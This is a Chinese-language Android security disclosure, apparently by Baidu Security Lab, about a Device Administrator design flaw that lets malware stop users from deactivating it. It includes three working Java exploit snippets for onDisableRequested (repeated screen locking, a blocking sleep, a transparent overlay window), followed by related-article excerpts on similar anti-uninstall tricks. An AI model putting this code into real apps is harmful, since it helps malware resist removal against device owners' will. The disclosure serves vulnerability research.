Android设备管理器漏洞2--阻止用户取消激活设备管理器

2013年6月,俄罗斯安全厂商卡巴斯基发现了史上最强手机木马-Obad.A,该木马利用了一个未知的Android设备管理器漏洞(ANDROID-9067882),已激活设备管理器权限的手机木马利用该漏洞,可以在设置程序的设备管理器列表中隐藏,这样用户就无法通过正常途径取消该手机木马的设备管理器权限,从而达到无法卸载的目的。Android4.2版本以上系统已经修复该漏洞。(漏洞详情:http://blog.csdn.net/androidsecurity/article/details/9124747)

日前,百度安全实验室发现手机木马开始利用另一新的Android设备管理器漏洞,新的设备管理器漏洞是由于Android系统在取消激活设备管理器流程的设计缺陷引起的,恶意软件利用该设计缺陷,可以阻止用户取消激活设备管理器,进而达到反卸载的目的。该漏洞存在于Android系统所有版本。

一、取消激活设备管理器源代码分析

Android取消激活设备管理器流程源代码:

Android取消激活设备管理器基本流程图:

1、ActivityManagerNative.getDefault().stopAppSwitch()方法功能

为什么第一步就调用该函数呢?通过源代码注释可以看出调用该函数目的是:禁止其它程序在用户取消设备管理器操作过程弹出Dialog,影响用户操作。

stopAppSwitch()源代码如下图所示:

通过代码我们发现该方法的具体实现是:

规定在APP_SWITCH_DELAY_TIME时间内禁止进行Activity切换。该方法调用后,所有应用的Activity调用请求会被系统放到挂起的请求队列中。被挂起的Activity调用请求会在APP_SWITCH_DELAY_TIME时间后才会被系统执行。

通过调用stopAppSwitch()方法,系统保证在进入取消设备管理器界面后,5秒内不会进行Activity的切换。

二、漏洞原理分析

通过以上流程我们发现,在第8步设备管理器调用

DevicePolicyManagerService.removeActiveAdmin()取消激活设备管理器之前,DevicePolicyManagerService会调用应用的onDisableRequested方法获取取消激活的警示信息。如果onDisableRequested函数返回内容为空的,第8步就会自动执行;如果onDisableRequested函数返回内容不能为空,会弹出Dialog显示返回的警示信息,提示用户是否取消激活。用户点击确认后才会执行第8步。

如何阻止流程执行到第8步呢?

onDisableRequested是唯一在流程第8步之前被调用的函数。为了阻止流程走到第8步,onDisableRequested函数满足以下条件即可:

1、返回内容不能为空,这样才可以使设备管理器弹出取消激活设备管理器警示信息  Dialog。

2、通过Activity切换的方式使设备管理器弹出的警示信息Dialog消失。使用户无法操作Dialog。

如果做到以上两点,程序即可成功阻止用户取消激活设备管理器操作。

三、漏洞利用方法

以下提出三种可以利用该流程设计缺陷,成功阻止用户取消设备管理器的方法。

1、通过锁屏方式

[java] view plaincopy

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. final DevicePolicyManager dpm = (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
  8. dpm.lockNow();
  9. new Thread(new Runnable() {
  10. @Override
  11. public void run() {
  12. int i = 0;
  13. while(i<70){
  14. dpm.lockNow();
  15. try {
  16. Thread.sleep(100);
  17. i++;
  18. } catch (InterruptedException e) {
  19. e.printStackTrace();
  20. }
  21. }
  22. }
  23. }).start();
  24. return "This is a onDisableRequested response message";
  25. }

2、通过阻塞函数返回方式

[java] view plaincopy

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. try {
  8. Thread.sleep(7000);
  9. } catch (InterruptedException e) {
  10. e.printStackTrace();
  11. }
  12. return "This is a onDisableRequested response message";
  13. }

3、通过透明窗口劫持方式

[java] view plaincopy

  1. @Override
  2. public CharSequence onDisableRequested(Context context, Intent intent) {
  3. // TODO Auto-generated method stub
  4. Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
  5. intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
  6. context.startActivity(intent1);
  7. WindowManager.LayoutParams wmParams;
  8. final WindowManager mWindowManager;
  9. wmParams = new WindowManager.LayoutParams();
  10. mWindowManager = (WindowManager)context.getSystemService(Context.WINDOW_SERVICE);
  11. wmParams.type = WindowManager.LayoutParams.TYPE_SYSTEM_ALERT;
  12. wmParams.format = PixelFormat.RGBX_8888;
  13. wmParams.flags = WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE;
  14. wmParams.gravity = Gravity.LEFT | Gravity.TOP;
  15. wmParams.alpha = 0;
  16. wmParams.x = 0;
  17. wmParams.y = 0;
  18. wmParams.width = WindowManager.LayoutParams.MATCH_PARENT;
  19. wmParams.height = WindowManager.LayoutParams.MATCH_PARENT;
  20. final View contentView = new Button(context);
  21. mWindowManager.addView(contentView, wmParams);
  22. new Thread(new Runnable() {
  23. @Override
  24. public void run() {
  25. try {
  26. Thread.sleep(7000);
  27. } catch (InterruptedException e) {
  28. // TODO Auto-generated catch block
  29. e.printStackTrace();
  30. }
  31. mWindowManager.removeView(contentView);
  32. }
  33. }).start();
  34. return "This is a onDisableRequested response message";
  35. }

以上方法都会在onDisableRequested中,采用不同方式使用户在5秒时间内无法操作界面。因为5秒后Activity切换请求才会被系统执行。

时间: 2024-11-07 18:41:53

Android设备管理器漏洞2--阻止用户取消激活设备管理器的相关文章

Android设备管理器漏洞2--禁止用户取消激活设备管理器

2013年6月,俄罗斯安全厂商卡巴斯基发现了史上最强手机木马-Obad.A.该木马利用了一个未知的Android设备管理器漏洞(ANDROID-9067882),已激活设备管理器权限的手机木马利用该漏洞,能够在设置程序的设备管理器列表中隐藏,这样用户就无法通过正常途径取消该手机木马的设备管理器权限.从而达到无法卸载的目的.Android4.2版本号以上系统已经修复该漏洞.(漏洞详情:http://blog.csdn.net/androidsecurity/article/details/9124

Android 设备管理器 阻止用户取消激活

该方案测试可行,系统版本4.4.2.它算是借助android系统的一个bug,不确定在后续更高的版本中是否修复. 该功能和360防卸载功能一样的实现原理. 主要的参考资料是:http://bbs.pediy.com/showthread.php?t=193123 public class MantaAdminReceiver extends DeviceAdminReceiver { @Override public void onReceive(Context context, Intent

Android设备管理器漏洞分析!

一.漏洞描述 目前被称为“史上最强Android木马”的病毒Backdoor.AndroidOS.Obad.a利用Android设备管理器漏洞使用户无法通过正常方式卸载.其实该漏洞早在去年底已被发现. 注册为“设备管理器”的应用是无法被直接卸载的.只有取消激活“设备管理器”后才可以直接卸载.  木马可以利用Android设备管理器漏洞达到在设备管理器列表“隐身”的效果.这样用户就无法进去“取消激活”页面,从而达到无法卸载的目的. 二.影响版本 Android2.2以上(4.0,4.1,4.2)

apk漏洞记录1:伪加密+设备管理器不可删+webview漏洞

伪加密1:apk打开需要密码 成因:修改zip的头,把文件的加密标志设置为ture,还原就把加密标志设置为false.利用了Android处理zip文件不判断头里的加密信息,其他压缩软件,java默认实现的zip api都有检测zip头中的加密信息 伪加密2:apk压缩文件被破坏 成因:APK在PC上面可以看作一个压缩文件,在Android系统里面它就是一个手机系统软件文件.Android系统对APK的识别是从标志头到标志尾,其他多余数据都会无视.所以说在标志尾添加其他数据对把APK看做压缩文件

Android基础入门教程——10.2 SmsManager(短信管理器)

Android基础入门教程--10.2 SmsManager(短信管理器) 标签(空格分隔): Android基础入门教程 本节引言: 本节带来的是Android中的SmsManager(短息管理器),见名知意,就是用来管理手机短信的, 而该类的应用场景并不多,一般是我们发短信的时候才会用到这个API,当然这种短信是 文字短信,对于彩信过于复杂,而且在QQ微信各种社交APP横行的年代,你会去发1块钱一条的 彩信吗?所以本节我们只讨论发送普通文字短信! 官方文档:SmsManager 1.调用系统

YS web socket存在横向越权漏洞,当前用户可任意查看其他用户的报警信息,可导致敏感信息泄漏【高】

YS web socket存在横向越权漏洞,当前用户可任意查看其他用户的报警信息,可导致敏感信息泄漏[高] 问题描述:          YS使用定时轮询web socket的方式获取用户设备的报警信息(比如报警图片),在客户端向服务器发送轮询请求期间,若发生设备报警,则将报警信息将实时推送到客户端进行显示,但在此过程中,要查询的设备是通过和用户名绑定的,也就是说绑定指定的用户名,服务器就返回该用户对应的设备的报警信息,而不是当前登录用户的报警信息. 测试步骤: 1.  打开burp拦截代理,并

Android新的漏洞的应用程序中的发现!

最近,趋势科技发现一些Android中的漏洞应用程序内存.来发动攻击.我们调查了两个受影响的应用程序,大家来感受一下: 1.超过一千万次安装.及在下载页面拥有数十万笔用户留言的生产力应用程序(生产力应用程序是能够提高企业生产力或者软件开发能力的软件组件.) 2.超过一百万次安装.及在下载页面拥有数千笔使用者留言的购物相关应用程序 watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvaXF1c2hp/font/5a6L5L2T/fontsize/400/fil

android提权漏洞CVE-2010-EASY修复【转】

本文转载自: http://blog.csdn.net/lhj0711010212/article/details/9351131 android提权漏洞CVE-2010-EASY修复 linux系统由udev提供系统设备的管理,比如提供热拔插usb设备等等.而Android把udev的工作移交给init进程.而linux中版本号小于1.4.1的udev不会检查是由内核还是用户发送热拔插信息.因此用户可以发送恶意的信息让内核加载定义的恶意程序从而取得root权限.该代码如下. 程序执行的顺序用(

阻止用户双击使屏幕上滑

/*阻止用户双击使屏幕上滑*/var agent = navigator.userAgent.toLowerCase();        //检测是否是iosvar iLastTouch = null;                                //缓存上一次tap的时间if (agent.indexOf('iphone') >= 0 || agent.indexOf('ipad') >= 0){    document.body.addEventListener('tou